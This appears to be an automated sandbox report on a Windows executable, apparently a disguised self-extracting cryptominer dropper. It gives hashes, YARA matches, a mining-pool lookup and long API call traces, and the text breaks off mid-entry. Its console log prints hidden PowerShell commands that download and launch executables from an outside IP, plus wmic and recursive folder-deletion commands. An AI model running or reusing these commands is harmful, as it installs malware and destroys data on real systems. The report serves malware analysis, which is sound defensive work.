popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

kch.com

Gen1 Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 12, 2021, 10:39 a.m. April 12, 2021, 10:41 a.m.
Size 294.7KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 712696c784185d9eaa3c7dccf54a5f68
SHA256 372cb63d7b42b6d3963097f324ef997e0f30e56a9ed3c2edd506de3a236cd74d
CRC32 3E557F0B
ssdeep 6144:m/fAhvV6B8ErzPZp5wdz753RSriX+tGrUHBQ:mfAv6B8azBwdmiX+tGAHBQ
PDB Path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara
  • escalate_priv - Escalade priviledges
  • screenshot - Take screenshot
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_files_operation - Affect private profile
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • HasOverlay - Overlay Check
  • HasDebugData - DebugData Check
  • HasRichSignature - Rich Signature Check

Name Response Post-Analysis Lookup
pool.hashvault.pro
A 131.153.159.26
A 131.153.76.130
131.153.76.130
IP Address Status Action
131.153.76.130 Active Moloch
164.124.101.2 Active Moloch
34.126.93.163 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: wmic
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: RD
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /S /Q "C:\Windows (x86)"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The system cannot find the file specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ping
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 127.0.0.1 -n 5
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: nul
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: PowerShell
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: PowerShell
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ping
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 127.0.0.1 -n 10
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: nul
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: RD
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /S /Q "C:\Users\test22\AppData\Local\Temp\updateW\"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The process cannot access the file because it is being used by another process.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: No Instance(s) Available.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002efc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef7e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef7e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef7e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f00a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f05a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002f05a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029d028
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029da28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029da28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029da28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .gfids
resource name PNG
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 5631328
registers.edi: 6681836
registers.eax: 5631328
registers.ebp: 5631408
registers.edx: 53
registers.ebx: 5631692
registers.esi: 2147746133
registers.ecx: 6449304
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72ce6f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72ce6e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x72ce27a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72ce2652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x72ce253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72ce2411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x72ce25ab
wmic+0x39c80 @ 0x389c80
wmic+0x3b06a @ 0x38b06a
wmic+0x3b1f8 @ 0x38b1f8
wmic+0x36fcd @ 0x386fcd
wmic+0x3d6e9 @ 0x38d6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 2812496
registers.edi: 1957755408
registers.eax: 2812496
registers.ebp: 2812576
registers.edx: 1
registers.ebx: 6418964
registers.esi: 2147746133
registers.ecx: 3811565449
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.126.93.163/xm/win.com
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.126.93.163/xm/64a1.com
request GET http://34.126.93.163/xm/win.com
request GET http://34.126.93.163/xm/64a1.com
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x728c2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cb2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02870000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72311000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72312000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02702000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02712000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02901000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02902000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02713000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02714000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0274b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02747000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02732000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02745000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02716000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0274c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02733000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02734000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
